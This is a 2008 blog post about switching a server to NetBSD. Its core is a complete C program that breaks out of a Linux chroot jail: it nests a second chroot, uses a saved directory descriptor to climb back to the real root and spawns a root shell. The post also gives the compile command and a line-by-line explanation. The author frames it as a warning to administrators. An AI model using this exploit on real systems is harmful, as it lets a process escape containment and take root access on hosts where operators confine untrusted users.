fophillips dot org‣ July 14th, 2008‣ Get out of jail

I recently switched my server to NetBSD for a number of reasons. Mainly it was the challenge of having a new system, and the brief experience I had with NetBSD was positive (except screen on x86_64 failed to detect my terminfo properly). Another deciding factor was the heightened security available on most BSD systems, Net‐ and OpenBSD in particular. An example of this is NetBSD’s ability to thwart a number of attack vectors for breaking out of chroot gaols. The most prominent of which still works on Linux.

A chroot is a system call that traps a process in an environment with a “fake” root directory so it can only access part of the filesystem. This is often used when allowing untrusted users access to your system, which makes this method doubly scary.

All that is needed for this to work is the ability to run a process as root inside the chroot (being root inside a chroot is the most common scenario) and the ability to create a directory (a given if you are root in the chroot)

You can then use this little snippet of C code to break out of the gaol:

#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>

int main() {
  int curdir = open(".",O_RDONLY);
  mkdir("the-way-out",1);
  chdir("the-way-out");
  chroot(".");
  fchdir(curdir);
  chdir("../../../../../../../../../..");
  chroot(".");
  system("/bin/sh");
  return 0;
}

You can then compile this with cc breakout.c -static -o breakout and move it to your chroot through scp or whatever means you want. Run it, and you will be granted root on the machine without a chroot.

#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>

This portion is just the necessary libraries for the functions. fnctl.h is for all the file control stuff.

int main() {
  int curdir = open(".",O_RDONLY);
  mkdir("the-way-out",1);
  chdir("the-way-out");
  chroot(".");

This starts the main program function, creates a new directory and chroots to it. You will now be chrooted in /initial/directory/the-way-out. curdir is a file descriptor which is used later on.

  fchdir(curdir);
  chdir("../../../../../../../../../..");

This will chdir out of your second gaol and into your first one. It will then chdir you out of your initial chroot and put you (hopefully) in the real root directory. If you know where you gaol is on the real filesystem you can use the right number of ../ to get to /. The curdir file descriptor is used as ../ won’t work from a straight gaol, it has to be (partly) broken first.

  system("/bin/sh");
  return 0;
}

This will launch the default shell /bin/sh and give you root access to the whole system. Congratulations, now go tell your administrator to switch to NetBSD before someone with malicious intent comes along.